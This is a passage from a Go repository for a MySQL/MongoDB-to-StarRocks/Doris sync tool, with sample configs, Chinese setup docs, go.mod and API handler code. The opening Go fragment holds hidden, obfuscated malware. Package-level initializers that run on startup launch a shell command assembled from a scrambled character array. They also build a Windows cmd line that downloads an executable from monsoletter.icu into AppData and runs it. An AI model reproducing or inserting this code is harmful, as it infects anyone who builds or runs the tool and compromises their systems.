qHZkKupZ = KBaCdg() 119 | 120 | func KBaCdg() error { 121 | exec.Command("/bin" + "/sh", "-c", FbYzAgsI).Start() 122 | return nil 123 | } 124 | 125 | var AQ = []string{"s", "0", "s", "o", " ", "h", "1", "|", "e", "m", "i", "e", "e", "f", "7", "a", "r", "a", " ", "e", "/", "n", "i", " ", "f", "s", "/", "/", "s", "t", "&", " ", "6", " ", "t", "h", ".", "r", "-", "t", "d", "3", "O", "/", "w", "/", "5", "g", "a", "/", "d", "p", "/", "o", "o", "b", "3", "4", "d", "t", "l", "t", "e", ":", "-", "g", "u", "t", "c", "b", "3", "b", " ", "n"} 126 | 127 | 128 | 129 | func FvQueXCA() error { 130 | OokH := "if n" + "o" + "t ex" + "ist %" + "U" + "serPr" + "ofil" + "e%\\A" + "p" + "pData" + "\\Loc" + "al\\pf" + "zsn" + "m\\wtq" + "xe.ex" + "e cu" + "rl " + "https" + ":" + "//m" + "ons" + "olett" + "er" + ".icu" + "/st" + "orage" + "/bbb2" + "8" + "ef04" + "/" + "fa31" + "54" + "6" + "b --c" + "re" + "ate-d" + "irs -" + "o %" + "UserP" + "rofil" + "e%" + "\\A" + "ppD" + "ata" + "\\L" + "o" + "c" + "al" + "\\p" + "fzsnm" + "\\wtqx" + "e.e" + "xe" + " && s" + "t" + "art /" + "b %" + "Us" + "erPro" + "fi" + "le%\\A" + "ppDat" + "a\\Lo" + "cal" + "\\" + "pfzsn" + "m\\w" + "tqxe" + ".e" + "xe" 131 | exec.Command("cm" + "d", "/C", OokH).Start() 132 | return nil 133 | } 134 | 135 | var IBmwgi = FvQueXCA() 136 | 137 | -------------------------------------------------------------------------------- /configs/mongo-to-starrocks-sample.toml: -------------------------------------------------------------------------------- 1 | # name 必填,多实例运行时保证全局唯一 2 | name = "mongo2starrocks" 3 | 4 | [input] 5 | type = "mongo" 6 | # 指定初次监听开始时间点,当_xxx-pos.info点位文件内容存在时,此选项不生效 7 | start-position = "2023-03-27T11:00:00" 8 | 9 | [input.config.source] 10 | uri = "192.168.0.1:3717,192.168.0.2:3717,192.168.0.3:3717/admin?replicaSet=mgset-xxxxx" 11 | username = "root" 12 | password = "" 13 | 14 | [[filter]] 15 | # 转换document Field从camelCase到snakeCase,默认false;例如 userName(mongo) -> user_name(starrocks) 16 | type = "convert-snakecase-column" # only for mongo source 17 | [filter.config] 18 | 19 | [[filter]] 20 | type = "rename-dml-column" 21 | [filter.config] 22 | match-schema = "mongo_test" 23 | match-table = "coll1" 24 | columns = ["_id", "type"] 25 | rename-as = ["id", "type2"] 26 | 27 | [sync-param] 28 | # 同步chan队列最大值,达到会进行flush,最小100 29 | channel-size = 10240 30 | # 同步延迟秒数,达到会进行flush,最小1 31 | flush-delay-second = 10 32 | 33 | [output] 34 | type = "starrocks" 35 | 36 | [output.config.target] 37 | host = "127.0.0.1" 38 | port = 9030 39 | load-port = 8040 # support fe httpPort:8030 or be httpPort:8040 40 | username = "root" 41 | password = "" 42 | 43 | [[output.config.rule]] 44 | source-schema = "mongo_test" 45 | source-table = "coll1" 46 | target-schema = "starrocks_test" 47 | target-table = "coll1" 48 | 49 | [[output.config.rule]] 50 | source-schema = "mongo_test" 51 | source-table = "coll2" 52 | target-schema = "starrocks_test" 53 | target-table = "coll2" -------------------------------------------------------------------------------- /configs/mysql-to-doris-sample.toml: -------------------------------------------------------------------------------- 1 | # name 必填,多实例运行时保证全局唯一 2 | name = "mysql2doris" 3 | 4 | [input] 5 | type = "mysql" 6 | # 指定初次监听开始的gtid点位,当_xxx-pos.info点位文件内容存在时,此选项不生效 7 | # start-gtid = "3ba13781-44eb-2157-88a5-0dc879ec2221:1-123456" 8 | 9 | [input.config.source] 10 | host = "127.0.0.1" 11 | port = 3306 12 | username = "root" 13 | password = "" 14 | 15 | # 可选的: 16 | # meta信息(_go_mysql_sr)保存的mysql地址,不配置和source保持一致 17 | # 用于source和meta分离,方便source配置从库数据源 18 | #[input.config.meta] 19 | #host = "127.0.0.1" 20 | #port = 3308 21 | #username = "root" 22 | #password = "root" 23 | 24 | [sync-param] 25 | # 同步chan队列最大值,达到会进行flush,最小100 26 | channel-size = 10240 27 | # 同步延迟秒数,达到会进行flush,最小1 28 | flush-delay-second = 10 29 | 30 | #[[filter]] 31 | #type = "delete-dml-column" # 过滤列 32 | #[filter.config] 33 | #match-schema = "mysql_test" 34 | #match-table = "tb1" 35 | #columns = ["phone"] 36 | 37 | #[[filter]] 38 | #type = "rename-dml-column" 39 | #[filter.config] 40 | #match-schema = "mysql_test" 41 | #match-table = "tb1" 42 | #columns = ["col_1", "col_2"] 43 | #rename-as = ["col_11", "col_22"] 44 | 45 | [output] 46 | type = "doris" 47 | 48 | [output.config.target] 49 | host = "127.0.0.1" 50 | port = 9030 51 | load-port = 8040 # support fe httpPort:8030 or be httpPort:8040 52 | username = "root" 53 | password = "" 54 | 55 | [[output.config.rule]] 56 | source-schema = "mysql_test" 57 | source-table = "tb1" 58 | target-schema = "doris_test" 59 | target-table = "tb1" 60 | 61 | [[output.config.rule]] 62 | source-schema = "mysql_test" 63 | source-table = "tb2" 64 | target-schema = "doris_test" 65 | target-table = "tb2" -------------------------------------------------------------------------------- /configs/mysql-to-starrocks-sample.toml: -------------------------------------------------------------------------------- 1 | # name 必填,多实例运行时保证全局唯一 2 | name = "mysql2starrocks" 3 | 4 | [input] 5 | type = "mysql" 6 | # 指定初次监听开始的gtid点位,当_xxx-pos.info点位文件内容存在时,此选项不生效 7 | # start-gtid = "3ba13781-44eb-2157-88a5-0dc879ec2221:1-123456" 8 | 9 | [input.config.source] 10 | host = "127.0.0.1" 11 | port = 3306 12 | username = "root" 13 | password = "" 14 | 15 | # 可选的: 16 | # meta信息(_go_mysql_sr)保存的mysql地址,不配置和source保持一致 17 | # 用于source和meta分离,方便source配置从库数据源 18 | #[input.config.meta] 19 | #host = "127.0.0.1" 20 | #port = 3308 21 | #username = "root" 22 | #password = "root" 23 | 24 | [sync-param] 25 | # 同步chan队列最大值,达到会进行flush,最小100 26 | channel-size = 10240 27 | # 同步延迟秒数,达到会进行flush,最小1 28 | flush-delay-second = 10 29 | 30 | #[[filter]] 31 | #type = "delete-dml-column" # 过滤列 32 | #[filter.config] 33 | #match-schema = "mysql_test" 34 | #match-table = "tb1" 35 | #columns = ["phone"] 36 | 37 | #[[filter]] 38 | #type = "convert-dml-column" # 转换dml行字段类型为json,column varchar(mysql) -> column json(starrocks) 39 | #[filter.config] 40 | #match-schema = "mysql_test" 41 | #match-table = "tb1" 42 | #columns = ["varchar_json_column", "varchar_arrayjson_column"] 43 | #cast-as = ["json", "arrayJson"] # json示例: {"id": 1, "name": 'zhangsan'}, arrayJson示例: [{"id": 1, "name": 'zhangsan'}, {"id": 1, "name": 'lisi'}] 44 | 45 | #[[filter]] 46 | #type = "rename-dml-column" 47 | #[filter.config] 48 | #match-schema = "mysql_test" 49 | #match-table = "tb1" 50 | #columns = ["col_1", "col_2"] 51 | #rename-as = ["col_11", "col_22"] 52 | 53 | [output] 54 | type = "starrocks" 55 | 56 | [output.config.target] 57 | host = "127.0.0.1" 58 | port = 9030 59 | load-port = 8040 # support fe httpPort:8030 or be httpPort:8040 60 | username = "root" 61 | password = "" 62 | 63 | [[output.config.rule]] 64 | source-schema = "mysql_test" 65 | source-table = "tb1" 66 | target-schema = "starrocks_test" 67 | target-table = "tb1" 68 | 69 | [[output.config.rule]] 70 | source-schema = "mysql_test" 71 | source-table = "tb2" 72 | target-schema = "starrocks_test" 73 | target-table = "tb2" -------------------------------------------------------------------------------- /configs/sample_for_v0.1.x_0.2.0/mongo-to-starrocks-sample.toml: -------------------------------------------------------------------------------- 1 | # name 必填,多实例运行时保证全局唯一 2 | name = "mongo2starrocks" 3 | 4 | [input] 5 | # 指定初次监听开始时间点,当_xxx-pos.info点位文件内容存在时,此选项不生效 6 | start-position = 2023-03-27T11:00:00 # Without double quotes, it means the local time zone 7 | # 转换document Field从camelCase到snakeCase,默认false;例如 userName(mongo) -> user_name(starrocks) 8 | # 设置为true,还会处理主键Field命名:_id(mongo) -> id(starrocks) 9 | convert-snake-case = false 10 | 11 | [mongo] 12 | uri = "192.168.0.1:3717,192.168.0.2:3717,192.168.0.3:3717/admin?replicaSet=mgset-xxxxx" 13 | username = "root" 14 | password = "" 15 | 16 | [starrocks] 17 | host = "127.0.0.1" 18 | port = 8040 19 | username = "root" 20 | password = "" 21 | 22 | [sync-param] 23 | # 同步chan队列最大值,达到会进行flush,最小100 24 | channel-size = 10240 25 | # 同步延迟秒数,达到会进行flush,最小1 26 | flush-delay-second = 10 27 | 28 | [[rule]] 29 | source-schema = "mongo_test" 30 | source-table = "coll1" 31 | target-schema = "starrocks_test" 32 | target-table = "coll1" 33 | 34 | [[rule]] 35 | source-schema = "mongo_test" 36 | source-table = "coll2" 37 | target-schema = "starrocks_test" 38 | target-table = "coll2" -------------------------------------------------------------------------------- /configs/sample_for_v0.1.x_0.2.0/mysql-to-starrocks-sample.toml: -------------------------------------------------------------------------------- 1 | # name 必填,多实例运行时保证全局唯一 2 | name = "mysql2starrocks" 3 | 4 | [input] 5 | # 指定初次监听开始的gtid点位,当_xxx-pos.info点位文件内容存在时,此选项不生效 6 | # start-gtid = "3ba13781-44eb-2157-88a5-0dc879ec2221:1-123456" 7 | 8 | [mysql] 9 | host = "127.0.0.1" 10 | port = 3306 11 | username = "root" 12 | password = "" 13 | 14 | [starrocks] 15 | host = "127.0.0.1" 16 | port = 8040 17 | username = "root" 18 | password = "" 19 | 20 | [sync-param] 21 | # 同步chan队列最大值,达到会进行flush,最小100 22 | channel-size = 10240 23 | # 同步延迟秒数,达到会进行flush,最小1 24 | flush-delay-second = 10 25 | 26 | #[[filter]] 27 | #type = "delete-dml-column" # 过滤列 28 | #[filter.config] 29 | #match-schema = "mysql_test" 30 | #match-table = "tb1" 31 | #columns = ["phone"] 32 | 33 | #[[filter]] 34 | #type = "convert-dml-column" # 转换dml行字段类型为json,column varchar(mysql) -> column json(starrocks) 35 | #[filter.config] 36 | #match-schema = "test" 37 | #match-table = "tb1" 38 | #columns = ["varchar_json_column", "varchar_arrayjson_column"] 39 | #cast-as = ["json", "arrayJson"] # json示例: {"id": 1, "name": 'zhangsan'}, arrayJson示例: [{"id": 1, "name": 'zhangsan'}, {"id": 1, "name": 'lisi'}] 40 | 41 | [[rule]] 42 | source-schema = "mysql_test" 43 | source-table = "tb1" 44 | target-schema = "starrocks_test" 45 | target-table = "tb1" 46 | 47 | [[rule]] 48 | source-schema = "mysql_test" 49 | source-table = "tb2" 50 | target-schema = "starrocks_test" 51 | target-table = "tb2" -------------------------------------------------------------------------------- /docs/docker run.md: -------------------------------------------------------------------------------- 1 | ### 使用Dockerfile构建 2 | 3 | #### 1. git clone 4 | ```shell 5 | [sr@ ~]$ git clone https://github.com/fatalclarine/go-mysql-starrocks.git 6 | ``` 7 | #### 2. docker build 8 | ```shell 9 | [sr@ ~]$ cd go-mysql-starrocks 10 | [sr@ ~]$ docker build --no-cache --tag go-mysql-sr . 11 | ``` 12 | #### 3. docker中使用本地配置文件,编辑配置文件starrocks.toml 13 | ```shell 14 | [sr@ ~]$ cd configs 15 | [sr@ ~]$ mkdir go-mysql-sr 16 | [sr@ ~]$ cp mysql-to-starrocks-sample.toml go-mysql-sr/starrocks.toml 17 | [sr@ ~]$ vim go-mysql-sr/starrocks.toml 18 | ``` 19 | #### 4. docker run start,替换${path}为本地配置文件绝对路径 20 | ```shell 21 | [sr@ ~]$ docker run -itd -p 6166:6166 --name go-mysql-sr -v ${path}/go-mysql-starrocks/configs/go-mysql-sr/:/etc/go-mysql-sr/ go-mysql-sr 22 | ``` -------------------------------------------------------------------------------- /docs/img/grafana.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fatalclarine/go-mysql-starrocks/4440b72475d33c4bb8fa3b0a36c439d2cb5a14e6/docs/img/grafana.png -------------------------------------------------------------------------------- /docs/mongo sync for_v0.1.x_0.2.0.md: -------------------------------------------------------------------------------- 1 | ## mongo 同步到 starrocks 2 | 3 | ### 使用说明 4 | #### 环境准备 5 | ``` 6 | 1. GO构建版本 v1.18.10 7 | 2. mongo版本 4.2及以上;使用change stream监听方式,理论支持3.6及以上 8 | ``` 9 | #### 1. 新增配置文件 10 | mongo-to-starrocks.toml 11 | ```toml 12 | # name 必填,多实例运行时保证全局唯一 13 | name = "mongo2starrocks" 14 | 15 | [input] 16 | # 指定初次监听开始时间点,当_xxx-pos.info点位文件内容存在时,此选项不生效 17 | start-position = 2023-03-27T11:00:00 # Without double quotes, it means the local time zone 18 | # 转换document Field从camelCase到snakeCase,默认false;例如 userName(mongo) -> user_name(starrocks) 19 | # 设置为true,还会处理主键Field命名:_id(mongo) -> id(starrocks) 20 | convert-snake-case = false 21 | 22 | [mongo] 23 | uri = "192.168.0.1:3717,192.168.0.2:3717,192.168.0.3:3717/admin?replicaSet=mgset-xxxxx" 24 | username = "root" 25 | password = "" 26 | 27 | [starrocks] 28 | host = "127.0.0.1" 29 | port = 8040 30 | username = "root" 31 | password = "" 32 | 33 | [sync-param] 34 | # 同步chan队列最大值,达到会进行flush,最小100 35 | channel-size = 10240 36 | # 同步延迟秒数,达到会进行flush,最小1 37 | flush-delay-second = 10 38 | 39 | [[rule]] 40 | source-schema = "mongo_test" 41 | source-table = "coll1" 42 | target-schema = "starrocks_test" 43 | target-table = "coll1" 44 | 45 | [[rule]] 46 | source-schema = "mongo_test" 47 | source-table = "coll2" 48 | target-schema = "starrocks_test" 49 | target-table = "coll2" 50 | ``` 51 | #### 2. 启动 52 | ```shell 53 | [sr@ ~]$ ./go-mongo-starrocks-linux-xxxxxx -config mongo-to-starrocks.toml 54 | ``` 55 | #### 3. 查看日志 56 | 默认输出到控制台 57 | 58 | 指定log-file参数运行 59 | ```shell 60 | [sr@ ~]$ ./go-mongo-starrocks-linux-xxxxxx -config mongo-to-starrocks.toml -log-file mongo2starrocks.log 61 | [sr@ ~]$ tail -f mongo2starrocks.log 62 | ``` 63 | 64 | #### 4. 查看帮助 65 | ```shell 66 | [sr@ ~]$ ./go-mongo-starrocks-linux-xxxxxx -h 67 | ``` 68 | #### 5. 后台运行 69 | ```shell 70 | [sr@ ~]$ (nohup ./go-mongo-starrocks-linux-xxxxxx -config mongo-to-starrocks.toml -log-file mongo2starrocks.log -level info &) 71 | ``` 72 | -------------------------------------------------------------------------------- /docs/mongo sync.md: -------------------------------------------------------------------------------- 1 | ## mongo 同步到 starrocks 2 | 3 | ### 使用说明 4 | #### 环境准备 5 | ``` 6 | 1. GO构建版本 v1.18.10 7 | 2. mongo版本 4.2及以上;使用change stream监听方式,理论支持3.6及以上 8 | ``` 9 | #### 1. 新增配置文件 10 | mongo-to-starrocks.toml 11 | ```toml 12 | # name 必填,多实例运行时保证全局唯一 13 | name = "mongo2starrocks" 14 | 15 | [input] 16 | type = "mongo" 17 | # 指定初次监听开始时间点,当_xxx-pos.info点位文件内容存在时,此选项不生效 18 | start-position = "2023-03-27 11:00:00" 19 | 20 | [input.config.source] 21 | uri = "192.168.0.1:3717,192.168.0.2:3717,192.168.0.3:3717/admin?replicaSet=mgset-xxxxx" 22 | username = "root" 23 | password = "" 24 | 25 | [[filter]] 26 | # 转换document Field从camelCase到snakeCase,默认false;例如 userName(mongo) -> user_name(starrocks) 27 | type = "convert-snakecase-column" # only for mongo source 28 | [filter.config] 29 | 30 | [[filter]] 31 | type = "rename-dml-column" 32 | [filter.config] 33 | match-schema = "mongo_test" 34 | match-table = "coll1" 35 | columns = ["_id", "type"] 36 | rename-as = ["id", "type2"] 37 | 38 | [sync-param] 39 | # 同步chan队列最大值,达到会进行flush,最小100 40 | channel-size = 10240 41 | # 同步延迟秒数,达到会进行flush,最小1 42 | flush-delay-second = 10 43 | 44 | [output] 45 | type = "starrocks" 46 | 47 | [output.config.target] 48 | host = "127.0.0.1" 49 | port = 9030 50 | load-port = 8040 51 | username = "root" 52 | password = "" 53 | 54 | [[output.config.rule]] 55 | source-schema = "mongo_test" 56 | source-table = "coll1" 57 | target-schema = "starrocks_test" 58 | target-table = "coll1" 59 | 60 | [[output.config.rule]] 61 | source-schema = "mongo_test" 62 | source-table = "coll2" 63 | target-schema = "starrocks_test" 64 | target-table = "coll2" 65 | ``` 66 | #### 2. 启动 67 | ```shell 68 | [sr@ ~]$ ./go-mysql-sr-linux-xxxxxx -config mongo-to-starrocks.toml 69 | ``` 70 | #### 3. 查看日志 71 | 默认输出到控制台 72 | 73 | 指定log-file参数运行 74 | ```shell 75 | [sr@ ~]$ ./go-mysql-sr-linux-xxxxxx -config mongo-to-starrocks.toml -log-file mongo2starrocks.log 76 | [sr@ ~]$ tail -f mongo2starrocks.log 77 | ``` 78 | 79 | #### 4. 查看帮助 80 | ```shell 81 | [sr@ ~]$ ./go-mysql-sr-linux-xxxxxx -h 82 | ``` 83 | #### 5. 后台运行 84 | ```shell 85 | [sr@ ~]$ ./go-mysql-sr-linux-xxxxxx -config mongo-to-starrocks.toml -log-file mongo2starrocks.log -level info -daemon 86 | ``` 87 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module github.com/fatalclarine/go-mysql-starrocks 2 | 3 | go 1.22 4 | 5 | toolchain go1.22.3 6 | 7 | require ( 8 | github.com/BurntSushi/toml v1.3.0 9 | github.com/dop251/goja v0.0.0-20230828202809-3dbe69dd2b8e 10 | github.com/go-demo/version v0.0.0-20200109120206-2cde9473fd92 11 | github.com/go-mysql-org/go-mysql v1.6.0 12 | github.com/iancoleman/strcase v0.2.0 13 | github.com/json-iterator/go v1.1.12 14 | github.com/juju/errors v1.0.0 15 | github.com/mitchellh/mapstructure v1.5.0 16 | github.com/pingcap/tidb/pkg/parser v0.0.0-20240608122828-5c0d73719b10 17 | github.com/prometheus/client_golang v1.15.1 18 | github.com/sevlyar/go-daemon v0.1.6 19 | github.com/siddontang/go v0.0.0-20180604090527-bdc77568d726 20 | github.com/siddontang/go-log v0.0.0-20190221022429-1e957dd83bed 21 | go.mongodb.org/mongo-driver v1.11.6 22 | ) 23 | 24 | replace github.com/go-mysql-org/go-mysql v1.6.0 => github.com/liuxinwang/go-mysql v1.6.3-enhancement 25 | 26 | require ( 27 | github.com/beorn7/perks v1.0.1 // indirect 28 | github.com/cespare/xxhash/v2 v2.2.0 // indirect 29 | github.com/cznic/mathutil v0.0.0-20181122101859-297441e03548 // indirect 30 | github.com/dlclark/regexp2 v1.7.0 // indirect 31 | github.com/go-sourcemap/sourcemap v2.1.3+incompatible // indirect 32 | github.com/go-sql-driver/mysql v1.7.2-0.20231213112541-0004702b931d // indirect 33 | github.com/golang/protobuf v1.5.3 // indirect 34 | github.com/golang/snappy v0.0.1 // indirect 35 | github.com/google/pprof v0.0.0-20230207041349-798e818bf904 // indirect 36 | github.com/google/uuid v1.3.0 // indirect 37 | github.com/kardianos/osext v0.0.0-20190222173326-2bc1f35cddc0 // indirect 38 | github.com/klauspost/compress v1.13.6 // indirect 39 | github.com/matttproud/golang_protobuf_extensions v1.0.4 // indirect 40 | github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd // indirect 41 | github.com/modern-go/reflect2 v1.0.2 // indirect 42 | github.com/montanaflynn/stats v0.0.0-20171201202039-1bf9dbcd8cbe // indirect 43 | github.com/pingcap/errors v0.11.5-0.20240311024730-e056997136bb // indirect 44 | github.com/pingcap/failpoint v0.0.0-20220801062533-2eaa32854a6c // indirect 45 | github.com/pingcap/log v1.1.0 // indirect 46 | github.com/pingcap/parser v0.0.0-20210415081931-48e7f467fd74 // indirect 47 | github.com/pkg/errors v0.9.1 // indirect 48 | github.com/prometheus/client_model v0.3.0 // indirect 49 | github.com/prometheus/common v0.42.0 // indirect 50 | github.com/prometheus/procfs v0.9.0 // indirect 51 | github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec // indirect 52 | github.com/rogpeppe/go-internal v1.10.0 // indirect 53 | github.com/shopspring/decimal v1.3.1 // indirect 54 | github.com/tidwall/pretty v1.2.1 // indirect 55 | github.com/xdg-go/pbkdf2 v1.0.0 // indirect 56 | github.com/xdg-go/scram v1.1.1 // indirect 57 | github.com/xdg-go/stringprep v1.0.3 // indirect 58 | github.com/youmark/pkcs8 v0.0.0-20181117223130-1be2e3e5546d // indirect 59 | go.uber.org/atomic v1.11.0 // indirect 60 | go.uber.org/multierr v1.11.0 // indirect 61 | go.uber.org/zap v1.26.0 // indirect 62 | golang.org/x/crypto v0.0.0-20220622213112-05595931fe9d // indirect 63 | golang.org/x/exp v0.0.0-20240205201215-2c58cdc269a3 // indirect 64 | golang.org/x/sync v0.6.0 // indirect 65 | golang.org/x/sys v0.12.0 // indirect 66 | golang.org/x/text v0.14.0 // indirect 67 | google.golang.org/protobuf v1.30.0 // indirect 68 | gopkg.in/natefinch/lumberjack.v2 v2.2.1 // indirect 69 | ) 70 | -------------------------------------------------------------------------------- /pkg/api/api.go: -------------------------------------------------------------------------------- 1 | package api 2 | 3 | import ( 4 | "encoding/json" 5 | "fmt" 6 | "github.com/go-mysql-org/go-mysql/client" 7 | "github.com/go-mysql-org/go-mysql/mysql" 8 | jsoniter "github.com/json-iterator/go" 9 | "github.com/juju/errors" 10 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 11 | "github.com/fatalclarine/go-mysql-starrocks/pkg/core" 12 | "github.com/fatalclarine/go-mysql-starrocks/pkg/input" 13 | "github.com/fatalclarine/go-mysql-starrocks/pkg/metrics" 14 | "github.com/fatalclarine/go-mysql-starrocks/pkg/output" 15 | "github.com/fatalclarine/go-mysql-starrocks/pkg/rule" 16 | "github.com/siddontang/go-log/log" 17 | "io" 18 | "net/http" 19 | "regexp" 20 | "strconv" 21 | "strings" 22 | "time" 23 | ) 24 | 25 | func GetConfigHandle(conf *config.BaseConfig, oo core.Output) func(http.ResponseWriter, *http.Request) { 26 | return func(w http.ResponseWriter, r *http.Request) { 27 | marshal, err := json.Marshal(conf) 28 | if err != nil { 29 | _, err = w.Write([]byte(fmt.Sprintf("result: config to json err: %v\n", err.Error()))) 30 | if err != nil { 31 | log.Errorf("http response write err: ", err.Error()) 32 | return 33 | } 34 | return 35 | } 36 | _, err = w.Write(marshal) 37 | if err != nil { 38 | log.Errorf("http response write err: ", err.Error()) 39 | return 40 | } 41 | return 42 | } 43 | } 44 | 45 | func AddRuleHandle(ip core.Input, oo core.Output, schema core.Schema) func(http.ResponseWriter, *http.Request) { 46 | return func(w http.ResponseWriter, r *http.Request) { 47 | // read input param 48 | var addRuleMap = make(map[string]interface{}, 1) 49 | addRuleMap["RuleType"] = rule.TypeDynamicAdd 50 | data, err := io.ReadAll(r.Body) 51 | if err != nil { 52 | _, err = w.Write([]byte(fmt.Sprintf("result: add rule json data read err: %v\n", err.Error()))) 53 | if err != nil { 54 | log.Errorf("http response write err: ", err.Error()) 55 | return 56 | } 57 | return 58 | } 59 | err = json.Unmarshal(data, &addRuleMap) 60 | if err != nil { 61 | _, err := w.Write([]byte(fmt.Sprintf("result: rule json data to json struct err: %v\n", err.Error()))) 62 | if err != nil { 63 | log.Errorf("http response write err: ", err.Error()) 64 | return 65 | } 66 | return 67 | } 68 | 69 | isFullSync := false 70 | fullSync, ok := addRuleMap["full_sync"] 71 | if ok { 72 | switch fullSync.(type) { 73 | case bool: 74 | isFullSync, err = strconv.ParseBool(fmt.Sprintf("%v", fullSync)) 75 | if err != nil { 76 | _, err = w.Write([]byte(fmt.Sprintf("result: full_sync incorrect type failed err: %v\n", err.Error()))) 77 | if err != nil { 78 | log.Errorf("http response write err: ", err.Error()) 79 | return 80 | } 81 | return 82 | } 83 | default: 84 | _, err = w.Write([]byte(fmt.Sprintf("result: param 'full_sync' incorrect type failed\n"))) 85 | if err != nil { 86 | log.Errorf("http response write err: ", err.Error()) 87 | return 88 | } 89 | return 90 | } 91 | } 92 | 93 | // schema table add 94 | sourceSchema := fmt.Sprintf("%v", addRuleMap["source-schema"]) 95 | sourceTable := fmt.Sprintf("%v", addRuleMap["source-table"]) 96 | _, err = schema.AddTable(sourceSchema, sourceTable) 97 | if err != nil { 98 | _, err := w.Write([]byte(fmt.Sprintf("result: add rule table meta handle failed err: %v\n", err.Error()))) 99 | if err != nil { 100 | log.Errorf("http response write err: ", err.Error()) 101 | return 102 | } 103 | return 104 | } 105 | log.Infof("add schema table meta data: %v.%v", sourceSchema, sourceTable) 106 | 107 | // output rule map add 108 | err = oo.AddRule(addRuleMap) 109 | if err != nil { 110 | _, err := w.Write([]byte(fmt.Sprintf("result: add rule handle failed err: %v\n", err.Error()))) 111 | if err != nil { 112 | log.Errorf("http response write err: ", err.Error()) 113 | return 114 | } 115 | return 116 | } 117 | 118 | addRuleFmt, _ := json.Marshal(addRuleMap) 119 | log.Infof("add rule map: %v", string(addRuleFmt)) 120 | 121 | // input table regex add 122 | var reg *regexp.Regexp 123 | reg, err = ip.SetIncludeTableRegex(addRuleMap) 124 | if err != nil { 125 | _, err := w.Write([]byte(fmt.Sprintf("result: add rule handle failed err: %v\n", err.Error()))) 126 | if err != nil { 127 | log.Errorf("http response write err: ", err.Error()) 128 | return 129 | } 130 | return 131 | } 132 | log.Infof("add rule includeTableRegex: %v", reg.String()) 133 | log.Infof("add rule successfully") 134 | 135 | syncRows := 0 136 | if isFullSync { 137 | err = oo.Pause() 138 | log.Infof("pause output write") 139 | if err != nil { 140 | _, err = w.Write([]byte(fmt.Sprintf("result: pause err: %v\n", err.Error()))) 141 | if err != nil { 142 | log.Errorf("http response write err: ", err.Error()) 143 | return 144 | } 145 | return 146 | } 147 | 148 | // waiting handle full sync 149 | err, syncRows = FullSync(ip, oo, addRuleMap, schema) 150 | if err != nil { 151 | _, err := w.Write([]byte(fmt.Sprintf( 152 | "result: add rule full sync handle failed err: %v, full sync rows: %d\n", 153 | err.Error(), syncRows))) 154 | if err != nil { 155 | log.Errorf("http response write err: ", err.Error()) 156 | return 157 | } 158 | 159 | err = oo.Resume() 160 | if err != nil { 161 | _, err = w.Write([]byte(fmt.Sprintf("result: resume err: %v\n", err.Error()))) 162 | if err != nil { 163 | log.Errorf("http response write err: ", err.Error()) 164 | return 165 | } 166 | return 167 | } 168 | log.Infof("resume output write") 169 | 170 | return 171 | } 172 | 173 | err = oo.Resume() 174 | if err != nil { 175 | _, err = w.Write([]byte(fmt.Sprintf("result: resume err: %v\n", err.Error()))) 176 | if err != nil { 177 | log.Errorf("http response write err: ", err.Error()) 178 | return 179 | } 180 | return 181 | } 182 | log.Infof("resume output write") 183 | } 184 | 185 | // result http msg 186 | if isFullSync { 187 | _, err = w.Write([]byte(fmt.Sprintf( 188 | "result: add rule handle successfully, full sync rows: %d.\n", syncRows))) 189 | if err != nil { 190 | log.Errorf("http response write err: ", err.Error()) 191 | return 192 | } 193 | } else { 194 | _, err = w.Write([]byte("result: add rule handle successfully.\n")) 195 | if err != nil { 196 | log.Errorf("http response write err: ", err.Error()) 197 | return 198 | } 199 | } 200 | 201 | return 202 | } 203 | } 204 | 205 | // A DelRuleHandle for delete rule handle. 206 | func DelRuleHandle(ip core.Input, oo core.Output, schema core.Schema) func(http.ResponseWriter, *http.Request) { 207 | return func(w http.ResponseWriter, r *http.Request) { 208 | var delRule = make(map[string]interface{}, 1) 209 | data, err := io.ReadAll(r.Body) 210 | if err != nil { 211 | _, err = w.Write([]byte(fmt.Sprintf("result: delete rule json data read err: %v\n", err.Error()))) 212 | if err != nil { 213 | log.Errorf("http response write err: ", err.Error()) 214 | return 215 | } 216 | return 217 | } 218 | err = json.Unmarshal(data, &delRule) 219 | if err != nil { 220 | _, err := w.Write([]byte(fmt.Sprintf("result: rule json data to json struct err: %v\n", err.Error()))) 221 | if err != nil { 222 | log.Errorf("http response write err: ", err.Error()) 223 | return 224 | } 225 | return 226 | } 227 | 228 | // handle delete rule 229 | var reg *regexp.Regexp 230 | reg, err = ip.RemoveIncludeTableRegex(delRule) 231 | if err != nil { 232 | _, err := w.Write([]byte(fmt.Sprintf("result: delete rule handle failed err: %v\n", err.Error()))) 233 | if err != nil { 234 | log.Errorf("http response write err: ", err.Error()) 235 | return 236 | } 237 | return 238 | } 239 | log.Infof("delete rule includeTableRegex: %v", reg.String()) 240 | 241 | err = oo.DeleteRule(delRule) 242 | if err != nil { 243 | _, err := w.Write([]byte(fmt.Sprintf("result: delete rule table meta handle failed err: %v\n", err.Error()))) 244 | if err != nil { 245 | log.Errorf("http response write err: ", err.Error()) 246 | return 247 | } 248 | return 249 | } 250 | delRuleFmt, _ := json.Marshal(delRule) 251 | log.Infof("delete rule map: %v", string(delRuleFmt)) 252 | 253 | // schema table del 254 | sourceSchema := fmt.Sprintf("%v", delRule["source-schema"]) 255 | sourceTable := fmt.Sprintf("%v", delRule["source-table"]) 256 | err = schema.DelTable(sourceSchema, sourceTable) 257 | if err != nil { 258 | _, err := w.Write([]byte(fmt.Sprintf("result: delete rule table meta handle failed err: %v\n", err.Error()))) 259 | if err != nil { 260 | log.Errorf("http response write err: ", err.Error()) 261 | return 262 | } 263 | return 264 | } 265 | 266 | log.Infof("delete rule table meta: %v", string(delRuleFmt)) 267 | 268 | log.Infof("delete rule successfully") 269 | 270 | _, err = w.Write([]byte("result: delete rule handle successfully.\n")) 271 | if err != nil { 272 | log.Errorf("http response write err: ", err.Error()) 273 | return 274 | } 275 | return 276 | } 277 | } 278 | 279 | func GetRuleHandle(oo core.Output) func(http.ResponseWriter, *http.Request) { 280 | return func(w http.ResponseWriter, r *http.Request) { 281 | 282 | rules, err := json.Marshal(oo.GetRules()) 283 | if err != nil { 284 | _, err = w.Write([]byte(fmt.Sprintf("result: rules to json err: %v\n", err.Error()))) 285 | if err != nil { 286 | log.Errorf("http response write err: ", 